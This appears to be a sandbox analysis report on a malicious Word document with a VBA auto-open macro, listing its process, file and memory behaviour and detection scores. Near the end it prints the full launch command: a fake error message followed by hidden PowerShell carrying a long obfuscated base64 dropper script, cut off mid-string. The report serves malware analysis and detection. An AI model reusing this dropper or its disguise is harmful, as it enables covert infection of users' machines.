Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1600	13_2_001D1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6E50	13_2_001C6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B367A	13_2_001B367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1E7D	13_2_001C1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8279	13_2_001C8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCA68	13_2_001BCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6A6F	13_2_001B6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B628A	13_2_001B628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5EBA	13_2_001B5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D12B6	13_2_001D12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B06B6	13_2_001B06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C66AE	13_2_001C66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C02A0	13_2_001C02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AD5	13_2_001C6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C06D1	13_2_001C06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD2C9	13_2_001BD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC6CE	13_2_001BC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C96EA	13_2_001C96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8EE2	13_2_001C8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6EE4	13_2_001B6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8B16	13_2_001B8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C7713	13_2_001C7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BFB05	13_2_001BFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BEF04	13_2_001BEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C473C	13_2_001C473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BAF28	13_2_001BAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCF5B	13_2_001BCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8355	13_2_001B8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4B48	13_2_001C4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5742	13_2_001B5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2B45	13_2_001C2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B1B46	13_2_001B1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD760	13_2_001BD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4F60	13_2_001C4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B2F97	13_2_001B2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE380	13_2_001BE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CBFB0	13_2_001CBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BF3B5	13_2_001BF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B33AB	13_2_001B33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5BAC	13_2_001B5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BA7A2	13_2_001BA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BB7C2	13_2_001BB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BABF8	13_2_001BABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B77F0	13_2_001B77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B27F4	13_2_001B27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C9BE4	13_2_001C9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6C05	14_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6E8A	14_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C9716	14_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CFB04	14_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D533C	14_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C4121	14_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D5748	14_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CE360	14_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DC19B	14_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D4DAD	14_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C83F0	14_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DA7E4	14_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C3618	14_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C1600	14_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D3600	14_2_001D3600

Source: DAT.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module T6dwlv_ivpoiq2, Function Document_open			Name: Document_open

Source: DAT.doc

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000E380 appears 41 times

Source: 00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Lyeta6ud.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995406845869

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@36/9@2/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00206686 CreateToolhelp32Snapshot,

20_2_00206686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$DAT.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp

Jump to behavior

Source: DAT.doc

OLE indicator, Word Document stream: true

Source: DAT.doc	OLE document summary: title field not present or empty
Source: DAT.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... ...............................h...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...0...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......x._.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F......................p.j......................X.............}..v.....`......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................p.j..... X...............X.............}..v....8a......0...............x._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j......................X.............}..v.....m......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j....X._...............X.............}..v.....n......0................._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j......................X.............}..v....8.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j..... X...............X.............}..v............0...............(._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F_.....(.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....P.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.5.............}..v............0................F_.....$.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j..... ................X.............}..v.....!......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............Q..j....@J_...............X.............}..v.....'......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....(................X.............}..v.....)......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............Q..j....@J_...............X.............}..v...../......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....0................X.............}..v.....1......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............Q..j....@J_...............X.............}..v.....7......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....8................X.............}..v.....9......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............Q..j......................X.............}..v.....?......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....@................X.............}..v.....A......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............Q..j....@J_...............X.............}..v.....G......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H................X.............}..v.....I......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............Q..j....@J_...............X.............}..v.....O......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....P................X.............}..v.....Q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............Q..j....@J_...............X.............}..v.....W......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....X................X.............}..v.....Y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v....._......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....`................X.............}..v.....a......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F.....................Q..j....@J_...............X.............}..v.....g......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....h................X.............}..v.....i......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....o......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....p................X.............}..v.....q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....w......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....x................X.............}..v.....y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....p.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............Q..j....@J_...............X.............}..v....@.......0.......................r.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j......................X.............}..v....x.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... .......Q..j....@J_...............X.............}..v............0................F_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j......................X.............}..v....@.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v......&.....0...............X._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v.... R&.....0...............X._.............0...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1

Source: DAT.doc	Virustotal: Detection: 71%
Source: DAT.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4